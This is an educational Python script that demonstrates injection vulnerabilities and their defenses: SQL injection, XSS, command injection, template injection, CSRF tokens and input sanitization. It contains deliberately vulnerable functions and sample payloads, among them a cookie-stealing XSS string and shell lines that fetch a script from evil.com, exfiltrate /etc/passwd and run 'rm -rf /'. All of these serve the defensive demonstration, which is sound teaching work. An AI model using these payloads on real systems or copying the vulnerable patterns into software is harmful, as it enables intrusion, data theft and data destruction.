injection_demo.py

Download
python 656 lines 20.1 KB
  1"""
  2Injection Attack Prevention Demo
  3================================
  4
  5Educational demonstration of injection vulnerabilities and their defenses:
  6- SQL Injection: vulnerable vs parameterized (sqlite3 in-memory)
  7- XSS: encoding/escaping with html.escape
  8- Command Injection: vulnerable os.system vs safe subprocess
  9- Template Injection: why f-strings in templates are dangerous
 10- CSRF token generation and validation
 11- Input sanitization utilities
 12
 13All examples are DEFENSIVE - demonstrating how to identify and
 14prevent injection attacks. Uses only Python standard library.
 15"""
 16
 17import html
 18import hashlib
 19import hmac
 20import json
 21import os
 22import re
 23import secrets
 24import shlex
 25import sqlite3
 26import subprocess
 27import time
 28from urllib.parse import quote as url_quote
 29
# Opening banner for the whole demo; printed as soon as the script runs.
print("=" * 65)
print("  Injection Attack Prevention Demo")
print("=" * 65)
print()


# ============================================================
# Section 1: SQL Injection - In Depth
# ============================================================

print("-" * 65)
print("  Section 1: SQL Injection Prevention")
print("-" * 65)

# Setup database
# ":memory:" gives a throwaway SQLite database. `conn` and `cur` are
# module-level names: the search_products_* helpers below run their queries
# through `cur`, and `conn` is closed at the very end of the script.
conn = sqlite3.connect(":memory:")
cur = conn.cursor()
cur.execute("""
    CREATE TABLE products (
        id INTEGER PRIMARY KEY,
        name TEXT,
        price REAL,
        category TEXT
    )
""")
# Seed rows are inserted with "?" placeholders; `id` is omitted so SQLite
# assigns it.
cur.executemany(
    "INSERT INTO products (name, price, category) VALUES (?, ?, ?)",
    [
        ("Laptop", 999.99, "electronics"),
        ("Mouse", 29.99, "electronics"),
        ("Desk Chair", 299.99, "furniture"),
        ("Notebook", 4.99, "stationery"),
        ("Monitor", 449.99, "electronics"),
    ],
)

# Second table holds the "secret" that the UNION-based injection demo
# further down tries to read through the products query.
cur.execute("""
    CREATE TABLE admin_settings (
        key TEXT PRIMARY KEY,
        value TEXT
    )
""")
cur.execute(
    "INSERT INTO admin_settings VALUES (?, ?)",
    ("secret_key", "SUPER_SECRET_ADMIN_KEY_12345"),
)
conn.commit()

# Overview text only; nothing below this print executes these payloads.
print("""
  SQL Injection Types:
  1. Classic: ' OR '1'='1
  2. UNION-based: ' UNION SELECT ... --
  3. Blind: AND 1=1 (boolean) or AND SLEEP(5) (time-based)
  4. Second-order: stored payload executed later
""")

# --- Classic SQL Injection ---
print("  -- Classic SQL Injection --")
 88
 89
 90def search_products_vulnerable(category: str) -> list:
 91    """VULNERABLE: User input directly in SQL."""
 92    query = f"SELECT name, price FROM products WHERE category = '{category}'"
 93    return cur.execute(query).fetchall()
 94
 95
 96def search_products_secure(category: str) -> list:
 97    """SECURE: Parameterized query."""
 98    return cur.execute(
 99        "SELECT name, price FROM products WHERE category = ?",
100        (category,),
101    ).fetchall()
102
103
# Normal usage
# Baseline: a benign category value through the parameterized helper.
print(f"\n  Normal search: category='electronics'")
results = search_products_secure("electronics")
for name, price in results:
    print(f"    {name}: ${price}")
print()

# UNION-based injection: extract data from other tables
# The leading quote closes the category literal, the UNION appends a second
# two-column SELECT, and the trailing "--" comments out the quote that the
# vulnerable helper appends after the input.
union_payload = "' UNION SELECT key, value FROM admin_settings --"
print(f"  UNION injection payload: {union_payload}")

print("  -- Vulnerable --")
# Broad except is deliberate here: whatever the injected SQL does, the demo
# prints the error and keeps going.
try:
    results = search_products_vulnerable(union_payload)
    for name, price in results:
        print(f"    {name}: {price}")
    print("    ^^ Admin secret key leaked!")
except Exception as e:
    print(f"    Error: {e}")

print("  -- Secure --")
# Same payload, but bound as a parameter: it is compared against `category`
# as an ordinary string, and no seeded category equals it.
results = search_products_secure(union_payload)
print(f"    Results: {results}  (empty - injection treated as literal string)")
print()

# --- Blind SQL Injection ---
# Explanatory text only; the payload shown is not executed.
print("  -- Blind SQL Injection Concept --")
print("""
  Blind injection infers data through true/false responses:

  Payload: electronics' AND (SELECT length(value) FROM admin_settings
           WHERE key='secret_key') > 10 --

  If results are returned -> condition is true -> length > 10
  If no results          -> condition is false -> length <= 10

  Attacker narrows down character by character.
  Defense: ALWAYS use parameterized queries.
""")

# --- Second-order injection ---
# Explanatory text only; there is no `users` table in this demo database.
print("  -- Second-Order Injection --")
print("""
  Stored payload that triggers on a later query:

  Step 1: Register username = "admin'--"
  Step 2: Password reset uses:
    UPDATE users SET password = ? WHERE username = '<stored_name>'
    Becomes: WHERE username = 'admin'--'  (updates admin's password!)

  Defense: Parameterize ALL queries, even with "trusted" DB data.
""")
print()
157
158
# ============================================================
# Section 2: XSS (Cross-Site Scripting) Prevention
# ============================================================

# Section banner: the title framed by two 65-character rules.
print("-" * 65, "  Section 2: XSS Prevention", "-" * 65, sep="\n")

# Short taxonomy of XSS variants, with a blank line before and after.
print(
    "\n"
    "  XSS Types:\n"
    "  1. Reflected: payload in URL/request, reflected in response\n"
    "  2. Stored: payload saved to DB, rendered to other users\n"
    "  3. DOM-based: payload manipulates client-side JavaScript\n"
)
173
174
def render_comment_vulnerable(username: str, comment: str) -> str:
    """VULNERABLE (kept on purpose for the demo): render a comment unescaped.

    Both arguments are inserted into the markup verbatim, so any HTML or
    script they contain becomes part of the returned fragment.
    """
    markup = "<div class='comment'><b>{}</b>: {}</div>"
    return markup.format(username, comment)
178
179
def render_comment_secure(username: str, comment: str) -> str:
    """SECURE: render a comment with both fields HTML-escaped.

    ``html.escape(..., quote=True)`` converts ``& < > " '`` to entities, so
    the values are displayed as text instead of being parsed as markup.
    """
    escaped_user, escaped_body = (
        html.escape(field, quote=True) for field in (username, comment)
    )
    return (
        "<div class='comment'><b>" + escaped_user + "</b>: "
        + escaped_body + "</div>"
    )
185
186
# Normal content
# Baseline: benign text contains none of the escaped characters.
print("\n  Normal comment:")
normal_user = "Alice"
normal_comment = "Great product! 5 stars."
print(f"    Secure:     {render_comment_secure(normal_user, normal_comment)}")
print()

# XSS payloads
# (payload, description) pairs. The payloads are only escaped and printed;
# none of them is rendered in a browser by this script.
xss_payloads = [
    ("<script>alert('XSS')</script>", "Basic script injection"),
    ('<img src=x onerror="alert(1)">', "Event handler injection"),
    ('"><script>document.location="http://evil.com/?c="+document.cookie</script>',
     "Cookie theft"),
    # Contains none of & < > " ' so html.escape() returns it unchanged.
    ("javascript:alert(1)", "JavaScript URI"),
    ('<svg onload="alert(1)">', "SVG event handler"),
]

print("  XSS Payload Escaping:")
for payload, desc in xss_payloads:
    escaped = html.escape(payload, quote=True)
    print(f"\n    Attack: {desc}")
    # Both columns are cut to 60 characters for display only.
    print(f"    Raw:     {payload[:60]}")
    print(f"    Escaped: {escaped[:60]}")
print()

# Context-specific encoding
print("  -- Context-Specific Encoding --")
214
215
def encode_for_html_attr(value: str) -> str:
    """Return ``value`` escaped for placement inside an HTML attribute.

    Delegates to ``html.escape`` with quote escaping enabled, so both ``"``
    and ``'`` are converted in addition to ``&``, ``<`` and ``>``.
    """
    encoded = html.escape(value, True)
    return encoded
219
220
def encode_for_url(value: str) -> str:
    """Return ``value`` percent-encoded for use as a URL component.

    ``safe`` is passed as the empty string, so ``/`` is encoded too (it is
    left alone by the default setting of ``urllib.parse.quote``).
    """
    no_exemptions = ""
    return url_quote(value, no_exemptions)
224
225
# Translation table for JavaScript string-literal escaping. Each key is a
# single character; str.translate() applies all mappings in one pass, so the
# backslashes introduced by one replacement are never re-escaped by another.
_JS_STRING_ESCAPES = str.maketrans({
    "\\": "\\\\",
    "'": "\\'",
    '"': '\\"',
    "\n": "\\n",
    "\r": "\\r",
    # Hex escapes keep "</script>" and HTML entities from being recognised
    # when the string literal sits inside an inline <script> block.
    "<": "\\x3c",
    ">": "\\x3e",
    "&": "\\x26",
    # U+2028 / U+2029 are line terminators in JavaScript source before
    # ES2019 and would end the string literal just like a raw newline.
    "\u2028": "\\u2028",
    "\u2029": "\\u2029",
})


def encode_for_javascript(value: str) -> str:
    """Encode ``value`` for use inside a quoted JavaScript string literal.

    Escapes backslashes, both quote characters, CR/LF, the Unicode line and
    paragraph separators, and ``<``, ``>``, ``&``. All other characters are
    returned unchanged.

    Args:
        value: Text to embed between JavaScript quotes.

    Returns:
        The escaped text. The surrounding quotes are NOT added.
    """
    return value.translate(_JS_STRING_ESCAPES)
237
238
# One input run through each context-specific encoder so the three results
# can be compared side by side.
test_input = '<script>alert("xss")</script>'
print(f"  Input:        {test_input}")
print(f"  HTML attr:    {encode_for_html_attr(test_input)}")
print(f"  URL:          {encode_for_url(test_input)}")
print(f"  JavaScript:   {encode_for_javascript(test_input)}")
print()


# ============================================================
# Section 3: Command Injection Prevention
# ============================================================

print("-" * 65)
print("  Section 3: Command Injection Prevention")
print("-" * 65)

# Summary text only; no command is executed by this print.
print("""
  VULNERABLE: os.system(), subprocess with shell=True
  SECURE:     subprocess.run() with list args, shell=False
""")
259
260
def ping_host_vulnerable(host: str) -> str:
    """
    VULNERABLE pattern (educational only): shell command built from raw input.

    Nothing is executed here: the function only assembles the command line
    a shell-based implementation would run and returns it inside a
    display string. DO NOT pass a string like this to a shell in production.
    """
    # Example of hostile input: "google.com; cat /etc/passwd"
    shell_line = "echo '[SIMULATED] ping -c 1 {}'".format(host)
    return "    Constructed command: " + shell_line
269
270
def ping_host_secure(host: str) -> str:
    """SECURE: validate the host, then build the command as an argument list.

    Nothing is executed; the function returns a display string showing
    either the rejected input or the argument list that would be handed to
    ``subprocess`` without a shell.

    Args:
        host: Candidate hostname or IP address from an untrusted source.

    Returns:
        ``"    Invalid hostname: <host>"`` when validation fails, otherwise
        ``"    Constructed command: <list repr>"``.
    """
    # Validate input first (allowlist).
    # - re.fullmatch: with re.match, "$" also matches just before a trailing
    #   newline, so "google.com\n" used to pass.
    # - The first character must be alphanumeric: a value starting with "-"
    #   would be read by the target program as an option, not as a host.
    if not re.fullmatch(r"[a-zA-Z0-9][a-zA-Z0-9.\-]*", host):
        return f"    Invalid hostname: {host}"

    # Use list form - no shell interpretation
    cmd = ["echo", "[SIMULATED] ping", "-c", "1", host]
    return f"    Constructed command: {cmd}"
280
281
# Normal input
# Both helpers only return a description of the command; nothing is run.
print("\n  Normal input: 'google.com'")
print(f"  Vulnerable: {ping_host_vulnerable('google.com')}")
print(f"  Secure:     {ping_host_secure('google.com')}")
print()

# Malicious input
malicious = "google.com; cat /etc/passwd"
print(f"  Malicious input: '{malicious}'")
print(f"  Vulnerable: {ping_host_vulnerable(malicious)}")
print("    ^^ Shell interprets ';' as command separator!")
print(f"  Secure:     {ping_host_secure(malicious)}")
print()

# Additional dangerous patterns
# (payload, description) pairs; each is only checked against the allowlist.
print("  -- Dangerous Shell Patterns --")
dangerous_inputs = [
    ("$(whoami)", "Command substitution"),
    ("`id`", "Backtick command substitution"),
    ("| cat /etc/shadow", "Pipe injection"),
    ("&& rm -rf /", "Command chaining"),
    ("; curl http://evil.com/shell.sh | sh", "Remote code execution"),
    ("$(curl evil.com/exfil?data=$(cat /etc/passwd))", "Data exfiltration"),
]

for payload, desc in dangerous_inputs:
    # fullmatch instead of match + "$": "$" would also accept a payload that
    # ends in a newline, which an allowlist check must not let through.
    validated = re.fullmatch(r"[a-zA-Z0-9.\-]+", payload) is not None
    status = "PASS" if validated else "BLOCKED"
    print(f"    [{status}] {desc}")
    print(f"           Payload: {payload}")

print()
print("  Safe alternatives to shell commands:")
print("    os.system()      -> subprocess.run([...], shell=False)")
print("    os.popen()       -> subprocess.run([...], capture_output=True)")
print("    shell=True       -> shell=False with list arguments")
print("    String commands  -> shlex.split() or list construction")
print()

# shlex.quote for when shell=True is unavoidable
# The quoted value is only printed here, never passed to a shell.
print("  -- shlex.quote() for shell escaping --")
user_filename = "my file; rm -rf /"
safe_quoted = shlex.quote(user_filename)
print(f"  Raw input:    {user_filename}")
print(f"  shlex.quote:  {safe_quoted}")
print("  (Wraps in single quotes, escapes internal quotes)")
print()
329
330
# ============================================================
# Section 4: Template Injection
# ============================================================

# Section banner: the title framed by two 65-character rules.
print("-" * 65, "  Section 4: Template Injection Prevention", "-" * 65, sep="\n")

# Introductory text, with a blank line before and after.
print(
    "\n"
    "  Server-Side Template Injection (SSTI) occurs when user input\n"
    "  is embedded directly into a template engine's template string.\n"
    "\n"
    "  In Python, even f-strings can be dangerous if used with\n"
    "  user-controlled format strings.\n"
)

# --- Dangerous: str.format() on a user-controlled template string ---
print("  -- Dangerous: User-Controlled Format Strings --")
349
350
def render_greeting_vulnerable(template_str: str, name: str) -> str:
    """
    VULNERABLE (kept on purpose for the demo): caller supplies the template.

    ``template_str`` is used as a ``str.format`` template with the fields
    ``name`` and ``greeting`` ("Hello"). Because format fields may contain
    attribute and index lookups, a hostile template can walk the attributes
    of the supplied objects.

    Returns the rendered text, or ``"Error: <message>"`` when formatting
    raises KeyError, AttributeError or IndexError.
    """
    # The danger is the template itself, not the values bound to it.
    fields = {"name": name, "greeting": "Hello"}
    try:
        rendered = template_str.format(**fields)
    except (KeyError, AttributeError, IndexError) as exc:
        rendered = f"Error: {exc}"
    return rendered
361
362
def render_greeting_secure(name: str) -> str:
    """SECURE: fixed greeting text; only the HTML-escaped name is inserted.

    The caller has no control over the template, so no format-field syntax
    in ``name`` is ever interpreted.
    """
    return "Hello, " + html.escape(name) + "! Welcome back."
367
368
# Normal usage
print(f"\n  Normal: {render_greeting_secure('Alice')}")

# Malicious template strings
# (template, description) pairs fed to render_greeting_vulnerable below.
malicious_templates = [
    ("{name.__class__.__mro__}", "Access class hierarchy"),
    # NOTE(review): for a plain str argument this lookup presumably ends in
    # the helper's AttributeError branch rather than exposing globals -
    # confirm on the target interpreter.
    ("{name.__class__.__init__.__globals__}", "Access global variables"),
    # The helper passes only keyword arguments to format(), so "{0}" has
    # nothing to resolve and is reported through its IndexError branch.
    ("{greeting} {name} - {0}", "Positional argument access"),
]

print("\n  Template injection attempts (format string):")
for template, desc in malicious_templates:
    result = render_greeting_vulnerable(template, "Alice")
    # Results are cut to 60 characters for display; "..." is always appended.
    truncated = str(result)[:60]
    print(f"    {desc}:")
    print(f"      Template: {template}")
    print(f"      Result:   {truncated}...")
print()

print("  Prevention:")
print("    1. Never let users control template strings")
print("    2. Use proper template engines with auto-escaping (Jinja2)")
print("    3. Use sandboxed template environments")
print("    4. Validate and sanitize all interpolated values")
print()
394
395
# ============================================================
# Section 5: CSRF Token Generation and Validation
# ============================================================

# Section banner: the title framed by two 65-character rules.
print(
    "-" * 65,
    "  Section 5: CSRF (Cross-Site Request Forgery) Protection",
    "-" * 65,
    sep="\n",
)

# Introductory text, with a blank line before and after.
print(
    "\n"
    "  CSRF tricks a user's browser into making unwanted requests\n"
    "  to a site where they're authenticated.\n"
    "\n"
    "  Defense: Include a secret token in forms that the attacker\n"
    "  cannot know or predict.\n"
)
411
412
class CSRFProtection:
    """HMAC-based CSRF token generation and validation.

    A token has the form ``"<unix_timestamp>:<hex_signature>"`` where the
    signature is HMAC-SHA256 over ``"<session_id>:<unix_timestamp>"`` keyed
    with the application secret. Tokens are therefore bound to one session
    and carry their own issue time.
    """

    def __init__(self, secret_key: str):
        """Store the application secret (encoded to bytes) as the HMAC key."""
        self.secret_key = secret_key.encode()

    def _sign(self, session_id: str, timestamp_str: str) -> str:
        """Return the hex HMAC-SHA256 of ``"<session_id>:<timestamp_str>"``."""
        message = f"{session_id}:{timestamp_str}".encode()
        return hmac.new(self.secret_key, message, hashlib.sha256).hexdigest()

    def generate_token(self, session_id: str) -> str:
        """Generate a CSRF token tied to a user's session.

        Args:
            session_id: Identifier of the session the token is issued for.

        Returns:
            ``"<timestamp>:<signature>"`` using the current time in whole
            seconds.
        """
        timestamp = str(int(time.time()))
        # Token format: timestamp:signature
        return f"{timestamp}:{self._sign(session_id, timestamp)}"

    def validate_token(self, token: str, session_id: str,
                       max_age: int = 3600) -> tuple[bool, str]:
        """Validate a CSRF token.

        Args:
            token: Token as received from the client. A missing form field
                usually shows up as ``None``; that is rejected, not raised.
            session_id: Session the request belongs to.
            max_age: Maximum accepted token age in seconds.

        Returns:
            ``(True, "Valid")`` on success, otherwise ``(False, reason)``.
            This method reports malformed input through the return value
            instead of raising.
        """
        # Previously a None token crashed on token.split() with an
        # AttributeError that the except clause below does not cover.
        if not isinstance(token, str):
            return False, "Invalid token format"

        try:
            parts = token.split(":")
            if len(parts) != 2:
                return False, "Invalid token format"

            timestamp_str, signature = parts
            timestamp = int(timestamp_str)

            # Check expiration
            if time.time() - timestamp > max_age:
                return False, "Token expired"

            # Recompute over the exact timestamp text received, then compare
            # in constant time so the check does not leak how many leading
            # characters matched.
            expected = self._sign(session_id, timestamp_str)
            if hmac.compare_digest(signature, expected):
                return True, "Valid"
            return False, "Invalid signature"

        except (ValueError, TypeError) as e:
            # ValueError: non-numeric timestamp. TypeError: compare_digest
            # rejects str arguments containing non-ASCII characters.
            return False, f"Validation error: {e}"
455
456
# Demo-only hard-coded secret and session id.
csrf = CSRFProtection("my-app-secret-key")
session_id = "sess_abc123"

# Generate token
token = csrf.generate_token(session_id)
print(f"\n  Session ID:     {session_id}")
print(f"  CSRF Token:     {token}")
print()

# Validate valid token
valid, msg = csrf.validate_token(token, session_id)
print(f"  Valid token:    {valid} ({msg})")

# Validate with different session
# The signature covers the session id, so the same token fails elsewhere.
valid, msg = csrf.validate_token(token, "sess_different")
print(f"  Wrong session:  {valid} ({msg})")

# Validate tampered token
# Overwrite the last five characters of the signature with "XXXXX", which
# cannot occur in a hex digest, so the comparison is guaranteed to fail.
tampered = token[:-5] + "XXXXX"
valid, msg = csrf.validate_token(tampered, session_id)
print(f"  Tampered token: {valid} ({msg})")
print()

# HTML form example
# Printed as text only, to show where the token goes as a hidden field.
print("  HTML form with CSRF token:")
print(f"""    <form method="POST" action="/transfer">
      <input type="hidden" name="csrf_token" value="{token}">
      <input type="text" name="amount" value="100">
      <button type="submit">Transfer</button>
    </form>
""")

print("  CSRF Prevention Checklist:")
print("    1. Include CSRF token in all state-changing forms")
print("    2. Validate token server-side on every POST/PUT/DELETE")
print("    3. Use SameSite=Lax or Strict cookies")
print("    4. Verify Origin/Referer headers as additional check")
print("    5. Use framework-provided CSRF protection (e.g., Flask-WTF)")
print()
496
497
# ============================================================
# Section 6: Input Sanitization Utilities
# ============================================================

# Section banner: the title framed by two 65-character rules.
print("-" * 65, "  Section 6: Input Sanitization Utilities", "-" * 65, sep="\n")
505
506
class Sanitizer:
    """Collection of stateless input sanitization helpers.

    Every method is a ``@staticmethod`` and can be called on the class or on
    an instance. These helpers reduce risk for one specific output context
    each; they do not replace parameterized queries or output encoding.
    """

    # One tag-like span: "<", at least one non-">" character, then ">".
    _TAG_RE = re.compile(r"<[^>]+>")
    # Characters replaced by "_" in filenames.
    _FILENAME_UNSAFE_RE = re.compile(r'[<>:"/\\|?*]')
    # Length caps for the two parts of a filename (200 + 55 = 255).
    _MAX_STEM_LEN = 200
    _MAX_EXT_LEN = 55
    # Device names Windows reserves regardless of extension ("CON.txt" too).
    _WINDOWS_RESERVED_NAMES = frozenset(
        {"CON", "PRN", "AUX", "NUL"}
        | {f"COM{i}" for i in range(1, 10)}
        | {f"LPT{i}" for i in range(1, 10)}
    )
    # Plain (unquoted) SQL identifier; always used with fullmatch().
    _SQL_IDENTIFIER_RE = re.compile(r"[a-zA-Z_][a-zA-Z0-9_]*")
    # Subset of SQL reserved words that are rejected as identifiers.
    _SQL_RESERVED_WORDS = frozenset({
        "SELECT", "INSERT", "UPDATE", "DELETE", "DROP", "TABLE",
        "FROM", "WHERE", "AND", "OR", "UNION", "JOIN",
    })
    # Every character str.splitlines() treats as a line boundary.
    _LINE_BREAK_RE = re.compile(r"[\n\r\x0b\x0c\x1c\x1d\x1e\x85\u2028\u2029]")
    # Any ANSI CSI sequence (colours, cursor movement, screen clearing):
    # ESC "[", parameter bytes, intermediate bytes, one final byte.
    _ANSI_CSI_RE = re.compile(r"\x1b\[[0-?]*[ -/]*[@-~]")

    @staticmethod
    def sanitize_html(text: str) -> str:
        """Remove all HTML tags, keep text content.

        Entities are decoded BEFORE tags are stripped. Decoding afterwards
        would turn an input such as ``&lt;script&gt;`` back into a live
        ``<script>`` tag in the "sanitized" result.

        The result is plain text, not safe HTML: escape it again (e.g. with
        ``html.escape``) before inserting it into a page. Regex stripping
        does not handle every malformed-markup case.

        Returns:
            The text with null bytes and tag-like spans removed and
            surrounding whitespace stripped.
        """
        # Null bytes go first so they cannot split an entity or a tag.
        clean = text.replace("\x00", "")
        # Decode entities
        clean = html.unescape(clean)
        # Remove tags, including any produced by the decoding step
        clean = Sanitizer._TAG_RE.sub("", clean)
        return clean.strip()

    @staticmethod
    def sanitize_filename(filename: str) -> str:
        """Sanitize a filename to prevent path traversal.

        Keeps only the final path component, removes null bytes, replaces
        ``< > : " / \\ | ? *`` with ``_``, drops leading dots, prefixes
        Windows reserved device names with ``_``, and caps the stem at 200
        and the extension at 55 characters.

        Returns:
            The sanitized name, or ``"unnamed"`` if nothing is left.
        """
        # Remove path separators
        filename = os.path.basename(filename)
        # Remove null bytes
        filename = filename.replace("\x00", "")
        # Remove dangerous characters
        filename = Sanitizer._FILENAME_UNSAFE_RE.sub("_", filename)
        # Remove leading dots (hidden files)
        filename = filename.lstrip(".")
        if not filename:
            return "unnamed"

        name, ext = os.path.splitext(filename)
        # Windows decides "reserved" on the part before the first dot and
        # ignores trailing spaces, so "CON.tar.gz" is reserved as well.
        device = name.split(".", 1)[0].rstrip().upper()
        if device in Sanitizer._WINDOWS_RESERVED_NAMES:
            name = "_" + name
        # Limit length. The extension is capped too; otherwise "a." followed
        # by thousands of characters would bypass the limit entirely.
        name = name[:Sanitizer._MAX_STEM_LEN]
        ext = ext[:Sanitizer._MAX_EXT_LEN]
        return name + ext

    @staticmethod
    def sanitize_sql_identifier(identifier: str) -> str:
        """Sanitize a SQL identifier (table/column name).
        For identifiers ONLY - use parameterized queries for values.

        Returns:
            ``identifier`` unchanged when it is acceptable.

        Raises:
            ValueError: If the identifier is not ``[a-zA-Z_][a-zA-Z0-9_]*``
                or is one of the listed reserved words (case-insensitive).
        """
        # Allow only alphanumeric and underscore. fullmatch is required:
        # with match + "$" the value "users\n" would be accepted, because
        # "$" also matches just before a trailing newline.
        if not Sanitizer._SQL_IDENTIFIER_RE.fullmatch(identifier):
            raise ValueError(f"Invalid SQL identifier: {identifier}")
        # Check against reserved words (subset)
        if identifier.upper() in Sanitizer._SQL_RESERVED_WORDS:
            raise ValueError(f"SQL reserved word: {identifier}")
        return identifier

    @staticmethod
    def sanitize_log_entry(text: str) -> str:
        """Sanitize text for safe logging (prevent log injection).

        Replaces every line-boundary character with a space, removes ANSI
        CSI escape sequences, and truncates the result to 500 characters.
        """
        # Remove line breaks (prevent log forging). Covers \n and \r plus
        # the other boundaries (VT, FF, FS/GS/RS, NEL, U+2028, U+2029).
        text = Sanitizer._LINE_BREAK_RE.sub(" ", text)
        # Remove ANSI escape codes (all CSI sequences, not only "...m").
        text = Sanitizer._ANSI_CSI_RE.sub("", text)
        # Limit length
        return text[:500]
561
562
# All Sanitizer methods are static; the instance is only a convenient handle.
sanitizer = Sanitizer()

# HTML sanitization
print("\n  -- HTML Sanitization --")
html_tests = [
    '<p>Hello <b>World</b></p>',
    '<script>alert("XSS")</script>Normal text',
    '<img src="x" onerror="steal()">Photo',
    '<a href="javascript:void(0)">Click</a>',
]
for test in html_tests:
    clean = sanitizer.sanitize_html(test)
    # Input is cut to 50 characters for display only.
    print(f"    Input:  {test[:50]}")
    print(f"    Clean:  {clean}")
    print()

# Filename sanitization
print("  -- Filename Sanitization --")
filename_tests = [
    "normal_file.txt",
    "../../../etc/passwd",
    "file\x00.txt.exe",
    '<script>alert("xss")</script>.html',
    "...hidden_file.txt",
    "CON.txt",  # Windows reserved name
]
for test in filename_tests:
    clean = sanitizer.sanitize_filename(test)
    # repr() makes the embedded null byte visible; left-aligned to 40 columns.
    print(f"    Input: {test!r:<40} -> {clean}")
print()

# SQL identifier sanitization
print("  -- SQL Identifier Sanitization --")
identifier_tests = [
    "users",
    "user_name",
    "1invalid",
    "DROP",
    "valid_table_123",
    "table; DROP TABLE users--",
]
for test in identifier_tests:
    # sanitize_sql_identifier signals rejection by raising ValueError.
    try:
        clean = sanitizer.sanitize_sql_identifier(test)
        print(f"    [{' OK '}] {test:<35} -> {clean}")
    except ValueError as e:
        print(f"    [BLOCK] {test:<35} -> {e}")
print()

# Log injection prevention
print("  -- Log Injection Prevention --")
log_tests = [
    "Normal log entry",
    "Fake entry\n2024-01-01 [INFO] Admin logged in",
    "Data with \x1b[31mANSI colors\x1b[0m",
]
for test in log_tests:
    clean = sanitizer.sanitize_log_entry(test)
    # repr() shows the newline and escape characters instead of acting on them.
    print(f"    Input: {test!r}")
    print(f"    Clean: {clean!r}")
    print()
624
625
# ============================================================
# Section 7: Summary
# ============================================================

print("=" * 65)
print("  Injection Prevention Summary")
print("=" * 65)
# Static recap table; it is plain text and not derived from the demo runs.
print("""
  Attack Type    | Primary Defense           | Secondary Defense
  ---------------+---------------------------+----------------------
  SQL Injection  | Parameterized queries     | Input validation, WAF
  XSS            | Output encoding/escaping  | CSP headers, sanitize
  Command Inj.   | Avoid shell, use lists    | Input allowlist, shlex
  Template Inj.  | Fixed templates, sandbox  | Auto-escaping engine
  CSRF           | Anti-CSRF tokens          | SameSite cookies
  Path Traversal | basename(), allowlist     | Chroot, sandboxing
  Log Injection  | Strip newlines/ANSI       | Structured logging

  Universal Principles:
  1. Never trust user input
  2. Validate input (allowlist > blocklist)
  3. Encode/escape output for the target context
  4. Use parameterized APIs (not string concatenation)
  5. Apply defense in depth (multiple layers)
  6. Keep dependencies updated
  7. Use security linters (bandit, semgrep)
""")

# Cleanup
# Closes the in-memory SQLite connection opened in Section 1.
conn.close()